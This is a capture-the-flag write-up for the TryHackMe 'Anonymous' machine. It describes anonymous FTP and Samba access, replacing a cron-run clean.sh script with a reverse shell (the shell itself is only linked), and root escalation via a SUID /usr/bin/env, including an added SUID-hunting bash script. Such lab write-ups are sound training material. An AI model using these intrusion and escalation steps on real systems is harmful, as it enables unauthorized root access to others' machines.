Anonymous TryHackMe (Writeup)

Difficulty: Medium

https://tryhackme.com/

Machine: https://tryhackme.com/room/anonymous

#NMAP:

Ok, Nmap shows that port 21 (FTP) is open and accepts anonymous logins, so let's log in as user "anonymous"!!

Let's go into the "scripts" directory and grab all the files inside with the command mget *. We get two files and one script.

This script (clean.sh) appears to remove files from /tmp (the temporary directory), and it also has execute permissions for everyone!

There are the other two files too, but they give us little information, so let's go and enumerate Samba!

We note that the "pics" share is readable, so let's try to log in to Samba without a password!

Ok, we are IN! And we can pull down the two pics. Now let's enumerate more. The two photos I downloaded turned out to be simply a rabbit hole, so let's go back to FTP. Since we saw that "clean.sh" is executable and is actually being run on the machine (it gets executed repeatedly, which is what we rely on), we can inject some malicious code into it.

For the injection I use my faithful friend, which I'll link here: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet Since the script is in bash, we inject a bash reverse shell.

We can also write a whole new script, obviously with the same name, and upload it in place of the original, so that it gets run automatically by the job that executes the script.

Ok, once this is done, reconnect to FTP, cd scripts, and finally put clean.sh. It must keep the same name, because that script is the one being run continuously; we are simply injecting our code into it. Start a listener on the port you chose, of course, before the upload.

ANDDDDDDDDD we are IN!!!!!!

#ENUMERATION:

First flag!! Let’s go.

Next, let's look for SUID binaries to exploit. Command: find / -perm -u=s 2>/dev/null

#Vertical Privilege Escalation:

/usr/bin/env shows up with the SUID bit set, and it is exploitable; for details visit: https://gtfobins.github.io/

Command: /usr/bin/env /bin/sh -p (the -p flag stops sh from dropping the effective root UID it inherits from the SUID binary)
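The SUID hunt above, as an added example (not the writeup's own commands): it lists every setuid file under a given root and flags the ones whose name is on a small, hand-picked subset of the GTFOBins SUID list. That subset is an assumption for illustration, not the full GTFOBins database, so always look the binary up on the site before trusting the hit.

```bash
#!/bin/bash
# Added example, not from the original writeup.
# GTFO_SUID is a constructed, partial list of binaries GTFOBins documents
# as abusable when setuid; treat it as a hint, not as complete.
GTFO_SUID="env find bash sh python3 perl vim nmap cp mv"

# Print every regular file with the setuid bit under $1 (default /).
# Errors (unreadable dirs) are discarded, as in the writeup's find command.
find_suid() {
    root="${1:-/}"
    find "$root" -type f -perm -u=s 2>/dev/null
}

# Print the path if its basename is on the list; return 1 otherwise.
flag_suid() {
    name=$(basename "$1")
    for g in $GTFO_SUID; do
        [ "$g" = "$name" ] && { printf '%s\n' "$1"; return 0; }
    done
    return 1
}

# Combined report: setuid binaries worth checking on gtfobins.github.io.
suid_report() {
    find_suid "$1" | while read -r p; do
        flag_suid "$p" || true
    done
}

# The escalation itself for the env case (GTFOBins SUID entry): env runs
# /bin/sh, and -p keeps the effective UID instead of dropping to the caller.
escalate_via_env() {
    /usr/bin/env /bin/sh -p
}
```

Run `suid_report /` on the box; if /usr/bin/env comes back, `escalate_via_env` gives the root shell, and `id` should show euid=0.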

Anddddd WE ARE ROOT!! I hope this has been useful to you. Good luck, guys.

| eCPTX | C|EH Master | CompTIA Security + | eJPT |